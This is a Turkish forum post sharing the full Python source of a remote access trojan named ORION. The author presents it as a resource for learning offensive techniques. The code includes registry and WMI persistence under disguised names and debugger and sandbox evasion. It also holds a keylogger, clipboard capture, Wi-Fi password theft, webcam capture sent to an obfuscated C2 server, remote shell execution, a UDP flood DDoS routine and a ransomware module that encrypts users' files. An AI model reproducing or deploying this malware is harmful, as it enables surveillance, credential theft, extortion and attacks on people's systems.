Uzun bir süredir üzerinde çalıştığım, Python tabanlı, çok fonksiyonlu ve modüler bir RAT (Remote Administration Tool) projesini sizlerle paylaşmaktan heyecan duyuyorum. Projenin kod adı ORION.
Amacım, tek bir script altında toplanmış, geliştirilmeye açık ama bir o kadar da etkili ve sinsi bir araç ortaya koymaktı. Kodun tamamı aşağıdadır. Özellikle siber güvenlik alanında ofansif mekanizmaların nasıl çalıştığını merak eden arkadaşlar için iyi bir kaynak olacağını düşünüyorum.
- Gelişmiş Kalıcılık: Sisteme hem Windows Kayıt Defteri (Registry) hem de WMI (Windows Management Instrumentation) üzerinden kendini yazarak kalıcılık sağlar.
- Anti-VM & Sandbox Tespiti: Sanal makinede veya bir analiz ortamında çalışıp çalışmadığını kontrol ederek kendini korumaya alır.
- Şifreli Komuta-Kontrol (C2) İletişimi: Tüm C2 haberleşmesini AES ile şifreleyerek ağda dinlenmeyi zorlaştırır.
- Keylogger:Tüm klavye vuruşlarını kaydeder.
- Pano Takibi: Kopyalanan verileri anlık olarak izler.
- Wi-Fi Şifrelerini Çalma: Sistemde kayıtlı tüm Wi-Fi ağlarının şifrelerini çeker.
- Webcam Görüntüsü Yakalama: Anlık olarak webcam'den görüntü alıp C2'ye gönderir.
- Ransomware Modülü: Hedef sistemdeki kullanıcı dosyalarını hızlıca şifreleyebilir.
- Yerel Ağda Yayılma (Worm): Yerel ağı tarayarak potansiyel yayılma hedefleri belirler (geliştirilmeye açık).
- DDoS Saldırı Yeteneği: C2'den gelen komutla belirlenen hedefe UDP Flood saldırısı başlatabilir.
- Modüler ve Çok Kanallı (Multithreaded): Tüm operasyonlarını (veri toplama, C2 iletişimi vb.) eş zamanlı olarak, sistemi kitlemeden yürütür.
- [
-
Python:
import os, sys, base64, requests, threading, time, random, string, shutil, glob, socket, subprocess, winreg, sqlite3, json, ctypes from ctypes import byref, c_ulong, windll # --- Dependencies that might need to be bundled --- try: from PIL import ImageGrab from cryptography.fernet import Fernet from pynput.keyboard import Key, Listener import cv2 import wmi import pyperclip from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from Crypto.Random import get_random_bytes except ImportError: # In a real scenario, these would be bundled or silently installed pass class cfg: C2_URL = "aHR0cDovLzE5Mi4xNjguMS4xMjo4MDgw" # b64("http://192.168.1.12:8080") C2_KEY = b'MySuperSecretKeyForC2Channel12345' # Must be 16, 24, or 32 bytes POLL_INTERVAL = 30 SPREAD_MARKER = "# MODIE_v4_OWNED" REG_KEY_PATH = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" REG_KEY_NAME = "SystemPerformanceMonitor" WMI_FILTER_NAME = "SysMonFilter" WMI_CONSUMER_NAME = "SysMonConsumer" LOG_DIR = os.path.join(os.getenv('APPDATA'), 'Intel\\Logs') class CryptoMod: def __init__(self, key): self.key = key[:32] def encrypt(self, data): iv = get_random_bytes(16) cipher = AES.new(self.key, AES.MODE_CBC, iv) encrypted_data = cipher.encrypt(pad(data, AES.block_size)) return base64.b64encode(iv + encrypted_data) def decrypt(self, enc_data): raw = base64.b64decode(enc_data) iv = raw[:16] encrypted_data = raw[16:] cipher = AES.new(self.key, AES.MODE_CBC, iv) return unpad(cipher.decrypt(encrypted_data), AES.block_size) class EvasionMod: def run_all(self): if self._is_debugged() or self._is_sandboxed(): time.sleep(3600) sys.exit(0) def _is_debugged(self): return windll.kernel32.IsDebuggerPresent() != 0 def _is_sandboxed(self): try: for _ in range(3): if windll.kernel32.GetTickCount() < 60000: time.sleep(30) else: return False except Exception: pass return True class PersistenceMod: def __init__(self): self.exe_path = os.path.join(cfg.LOG_DIR, 'audiodg.exe') if not os.path.exists(cfg.LOG_DIR): os.makedirs(cfg.LOG_DIR) shutil.copyfile(sys.executable, self.exe_path) def via_registry(self): try: key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, cfg.REG_KEY_PATH, 0, winreg.KEY_SET_VALUE) winreg.SetValueEx(key, cfg.REG_KEY_NAME, 0, winreg.REG_SZ, f'"{self.exe_path}"') winreg.CloseKey(key) except Exception: pass def via_wmi(self): try: c = wmi.WMI(namespace="root\\subscription") filt, _ = c.Get(f"__EventFilter.Name='{cfg.WMI_FILTER_NAME}'") except Exception: try: filt = c.new("__EventFilter") filt.Name = cfg.WMI_FILTER_NAME filt.Query = "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LogonSession'" filt.QueryLanguage = "WQL" filt.EventNamespace = "root\\cimv2" filt.put() consumer = c.new("ActiveScriptEventConsumer") consumer.Name = cfg.WMI_CONSUMER_NAME consumer.ScriptingEngine = "VBScript" script = f'CreateObject("Wscript.Shell").Run "{self.exe_path}", 0, False' consumer.ScriptText = script consumer.put() binder = c.new("__FilterToConsumerBinding") binder.Filter = filt.path() binder.Consumer = consumer.path() binder.put() except Exception: pass class CollectionMod: def __init__(self, c2): self.c2 = c2 self.log_path = os.path.join(cfg.LOG_DIR, "session.log") def _log(self, data): with open(self.log_path, "a", encoding='utf-8', errors='ignore') as f: f.write(data + "\n") def monitor_keys(self): def on_press(key): try: self._log(f'K:{key.char}') except AttributeError: self._log(f'K:[{str(key)}]') with Listener(on_press=on_press) as l: l.join() def monitor_clipboard(self): recent_val = "" while True: try: tmp_val = pyperclip.paste() if tmp_val != recent_val: recent_val = tmp_val self._log(f'C:{recent_val}') except Exception: pass time.sleep(5) def get_wifi_creds(self): try: profiles_data = subprocess.check_output('netsh wlan show profiles', shell=True, stderr=subprocess.DEVNULL, universal_newlines=True).strip() profiles = [line.split(':')[1][1:] for line in profiles_data.split('\n') if "All User Profile" in line] creds = "" for p in profiles: try: p_info = subprocess.check_output(f'netsh wlan show profile "{p}" key=clear', shell=True, stderr=subprocess.DEVNULL, universal_newlines=True).strip() for line in p_info.split('\n'): if "Key Content" in line: creds += f"SSID: {p}, PASS: {line.split(':')[1][1:]}\n" except Exception: continue return creds except Exception: return "Could not fetch WiFi creds." def capture_webcam(self): try: cam = cv2.VideoCapture(0) if not cam.isOpened(): return "No webcam found." ret, frame = cam.read() cam.release() if ret: path = os.path.join(cfg.LOG_DIR, "cam_cap.png") cv2.imwrite(path, frame) return self.c2.upload_file(path) return "Failed to capture." except Exception: return "Webcam module error." class SpreaderMod: def __init__(self): with open(sys.executable, 'rb') as f: self.self_code = f.read() def worm_lan(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) local_ip = s.getsockname()[0] s.close() prefix = ".".join(local_ip.split('.')[:-1]) vulnerable_hosts = [] def scan_port(ip): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.settimeout(0.5) if sock.connect_ex((ip, 445)) == 0: vulnerable_hosts.append(ip) # Simulate finding SMB port open threads = [] for i in range(1, 255): t = threading.Thread(target=scan_port, args=(f"{prefix}.{i}",)) threads.append(t) t.start() for t in threads: t.join() return f"LAN Scan complete. Potential targets: {vulnerable_hosts}" # In a real scenario, this would be followed by an exploit attempt except Exception: return "LAN scan failed." class PayloadMod: def __init__(self, c2): self.c2 = c2 def start_ddos(self, target, duration): end_time = time.time() + int(duration) ip, port = target.split(':') def flood(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1024) while time.time() < end_time: sock.sendto(bytes, (ip, int(port))) for _ in range(20): threading.Thread(target=flood, daemon=True).start() return f"DDoS started on {target} for {duration} seconds." def encrypt_user_files(self): try: key = Fernet.generate_key() self.c2.report("ransom_key", f"Key: {key.decode()}") fernet = Fernet(key) for root, _, files in os.walk(os.path.expanduser('~')): for file in files: try: filepath = os.path.join(root, file) with open(filepath, 'r+b') as f: chunk = f.read(1024 * 1024) # 1MB f.seek(0) f.write(fernet.encrypt(chunk)) os.rename(filepath, filepath + '.MODIE_LOCKED') except Exception: continue return "User files encrypted." except Exception as e: return f"Encryption failed: {e}" class C2Handler: def __init__(self): self.url = base64.b64decode(cfg.C2_URL).decode() self.crypto = CryptoMod(cfg.C2_KEY) self.bot_id = f"{socket.gethostname()}-{wmi.WMI().Win32_ComputerSystemProduct()[0].UUID}" self.session = requests.Session() self.session.headers.update({'User-Agent': f'MODIE_v4/{self.bot_id}'}) self.collection = CollectionMod(self) self.payloads = PayloadMod(self) self.spreader = SpreaderMod() def _req(self, endpoint, data): try: payload = self.crypto.encrypt(json.dumps(data).encode()) res = self.session.post(f"{self.url}/{endpoint}", data=payload, timeout=20) if res.status_code == 200: return json.loads(self.crypto.decrypt(res.content)) except Exception: pass return None def upload_file(self, filepath): try: with open(filepath, 'rb') as f: file_data = f.read() data = {'bot_id': self.bot_id, 'filename': os.path.basename(filepath), 'data': base64.b64encode(file_data).decode()} self.report("upload", data) os.remove(filepath) return "File uploaded." except Exception as e: return f"Upload failed: {e}" def report(self, r_type, data): self._req("report", {'bot_id': self.bot_id, 'type': r_type, 'data': data}) def heartbeart(self): while True: tasks = self._req("get_task", {'bot_id': self.bot_id}) if tasks: for task in tasks: self.execute_task(task) time.sleep(cfg.POLL_INTERVAL) def execute_task(self, task): cmd = task.get('command') args = task.get('args') res = "Unknown command" try: if cmd == 'shell': res = subprocess.check_output(args, shell=True, stderr=subprocess.STDOUT, universal_newlines=True) elif cmd == 'get_wifi': res = self.collection.get_wifi_creds() elif cmd == 'webcam': res = self.collection.capture_webcam() elif cmd == 'lan_scan': res = self.spreader.worm_lan() elif cmd == 'ddos': res = self.payloads.start_ddos(args['target'], args['duration']) elif cmd == 'encrypt': res = self.payloads.encrypt_user_files() elif cmd == 'upload_logs': res = self.upload_file(self.collection.log_path) elif cmd == 'die': sys.exit(0) except Exception as e: res = f"Task failed: {e}" self.report("task_result", {'task_id': task.get('id'), 'result': res}) class Orchestrator: def run(self): EvasionMod().run_all() p = PersistenceMod() p.via_registry() p.via_wmi() c2 = C2Handler() threads = [ threading.Thread(target=c2.heartbeart, daemon=True), threading.Thread(target=c2.collection.monitor_keys, daemon=True), threading.Thread(target=c2.collection.monitor_clipboard, daemon=True) ] for t in threads: t.start() while True: time.sleep(1) if __name__ == "__main__": Orchestrator().run() 
Son düzenleme:
